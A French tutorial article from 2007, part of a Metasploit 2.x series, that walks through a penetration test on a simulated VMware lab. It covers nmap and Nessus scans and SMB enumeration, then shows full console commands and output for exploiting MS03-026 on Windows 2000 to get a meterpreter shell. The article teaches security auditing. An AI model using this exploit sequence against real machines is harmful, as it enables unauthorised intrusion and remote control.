|
[Metasploit 2.x – Partie 6] Méthodologie d’un audit de sécurité
Par Rédaction,
secuobs.com
Le 28/12/2007
Résumé : Retrouver dans cette partie les détails relatifs aux étapes nécessaires à la réalisation d'un audit de sécurité, cet audit sera effectué sur un réseau simulé à l'aide de machines virtuelles de type Vmware. L'utilisation de Metasploit est ici conjointe à l'utilisation d'outils comme Nmap, Nessus et Netcat. - Lire l'article
Nous détaillerons ici, de manière succincte, les différentes étapes d’un pen-test (penetration testing) sur un réseau simulé basé sur des machines virtuelles vmware ( lien ) . Voici les informations concernant le réseau de tests :
Machine d’audit : 172.16.185.1 Linux
Réseau audité : 172.16.185.0/24
Les outils utilisés pour cet audit sont tous gratuits. il s’agit d’outils très connus dans le domaine de la sécurité :
- nmap ( lien )
- nessus ( lien )
- Metasploit ( lien )
- netcat ( lien )
Machine virtuelle Windows 2000
La première étape est une « reconnaissance » du réseau audité grâce à un ping scan de l’outil nmap.
Nous découvrons alors 4 machines sur ce réseau : 172.16.185.1 (notre machine), 172.16.185.100, 172.16.185.101 et 172.16.185.254. Les premiers tests plus approfondis s’effectuent sur l’hôte
172.16.185.101 via un scan TCP nmap (option –sT) avec reconnaissance de l’OS (option –O) et des services (option –sV). Les résultats du scan sont plutôt positifs pour un test d’intrusion et laissent apparaître un défaut de mises à jour évident sur une ancienne version de Windows 2000 ( lien ).
Nous lançons alors un scan Nessus qui permettra de confirmer ou d’infirmer nos suppositions et de tester différentes failles connues. Nous activons le mode « safe checks » afin d’éviter un crash de la machine distante, ce qui peut néanmoins donner quelques faux positifs. Nous vérifierons le résultat du scan grâce à la plateforme Metasploit. N’ayant pas de contrainte de furtivité, nous utiliserons également le module nmap de Nessus en mode insane pour accélérer le processus.
Le résultat confirme que la machine auditée présente de nombreuses failles critiques, notamment en raison de dernières mises à jour trop anciennes.
La probabilité de réussite de l’exploitation est ici très élevée mais nous devons cependant obtenir des informations plus précises concernant la machine distante : version Windows, numéro du service pack, langue, etc.
Les exploits sous Windows étant la plupart du temps relativement peu « portables », ces informations sont capitales quant aux chances de réussite de l’exploitation future. Une erreur entraînera presque à coup sur un plantage et il s’agit souvent d’exploits one shot ne laissant pas l’opportunité de relancer un test après une exploitation infructueuse, augmentant également les chances de détection de l’attaque.
Netbios ( lien ) étant activé et non filtré sur la machine auditée, nous allons récupérer des informations importantes via l’utilitaire smbclient contenu dans le package samba-client de la plupart des distributions Linux :
lapt41p:~# smbclient -L 172.16.185.101
Domain=[VM2000] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
Impressions Disk
IPC$ IPC IPC distant
ADMIN$ Disk Administration distance
C$ Disk Partage par dfaut
session request to 172.16.185.101 failed (Called name not present)
session request to 172 failed (Called name not present)
Domain=[VM2000] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Server Comment
--------- -------
Workgroup Master
--------- -------
Accès aux informations Netbios de la machine
La première information est qu’il s’agit bien effectivement d’une machine sous Windows 2000 et que la langue a de grandes chances d’être le Français (noms des partages). Ces informations permettront de définir les targets de Metasploit.
Les références des failles Nessus recensées permettent ensuite de choisir l’exploit à lancer contre cette machine… Le choix est large pour cette machine ! Metasploit se charge ensuite du reste :
msf > use msrpc_dcom_ms03_026
msf msrpc_dcom_ms03_026 > set PAYLOAD win32_bind_meterpreter
PAYLOAD -> win32_bind_meterpreter
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------- ------------------
required RHOST The target address
required RPORT 135 The target port
Payload: Name Default Description
-------- -------- ------------------------------------------------- required EXITFUNC thread Exit technique: "process", "thread", "seh"
required METDLL /home/user/Softs/Securite/Progs/metasploit_2.5/dat a/meterpreter/metsrv.dll The full path the meterpreter server dll
required LPORT 4444 Listening port for bind shell
Target: Windows NT SP3-6a/2K/XP/2K3 English ALL
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set TARGET 0
TARGET -> 0
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set RHOST 172.16.185.101
RHOST -> 172.16.185.101
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > set LPORT 12345
LPORT -> 12345
msf msrpc_dcom_ms03_026(win32_bind_meterpreter) > exploit
[*] Starting Bind Handler.
[*] Splitting RPC request into 7 packets
[*] Got connection from 172.16.185.1:40770 <-> 172.16.185.101:12345
[*] Sending Stage (2834 bytes)
[*] Sleeping before sending dll.
[*] Uploading dll to memory (69643), Please wait...
[*] Upload completed
meterpreter>
[ -= connected to =- ]
[ -= meterpreter server =- ]
[ -= v. 00000500 =- ]
meterpreter> use -m Fs
loadlib: Loading library from 'ext356083.dll' on the remote machine.
meterpreter>
loadlib: success.
meterpreter> cd \
cd: Changing directory to '’
meterpreter>
cd: success.
meterpreter> ls
ls: Requesting a directory listing
meterpreter>
Listing: *
Size Type Name
--------- ----- ----------------
145.50 KB REG arcldr.exe
(…)
Autres ressources disponibles dans ce dossier :
[Metasploit 2.x – Partie 1] Introduction et présentation – lien
[Metasploit 2.x – Partie 2] Introduction aux charges utiles – lien
[Metasploit 2.x – Partie 3] Les charges utiles disponibles – lien
[Metasploit 2.x – Partie 4] La charge utile Meterpreter – lien
[Metasploit 2.x – Partie 5] Scripting – lien
[Metasploit 2.x – Partie 7] Conclusion et webographie – lien
- Article suivant : [Metasploit 2.x – Partie 7] Conclusion et webographie
- Article précédent : [Metasploit 2.x – Partie 5] Scripting
- Article suivant dans la catégorie Tutoriels : [Metasploit 2.x – Partie 7] Conclusion et webographie
- Article précédent dans la catégorie Tutoriels : [Metasploit 2.x – Partie 5] Scripting
Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, attaque, outil, microsoft, réseau, audit, metasploit, vulnérabilité, système, virus, internet, usbsploit, données, source, linux, protocol, présentation, scanne, réseaux, scanner, bluetooth, conférence, reverse, shell, meterpreter, vista, rootkit, détection, mobile, security, malicieux, engineering, téléphone, paquet, trames, https, noyau, utilisant, intel, wishmaster, google, sysun, libre |
Mini-Tagwall de l'annuaire video : | | | | curit, security, biomet, metasploit, biometric, cking, password, windows, botnet, defcon, tutorial, crypt, xploit, exploit, lockpicking, linux, attack, wireshark, vmware, rootkit, conference, network, shmoocon, backtrack, virus, conficker, elcom, etter, elcomsoft, server, meterpreter, openvpn, ettercap, openbs, iphone, shell, openbsd, iptables, securitytube, deepsec, source, office, systm, openssh, radio |
Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|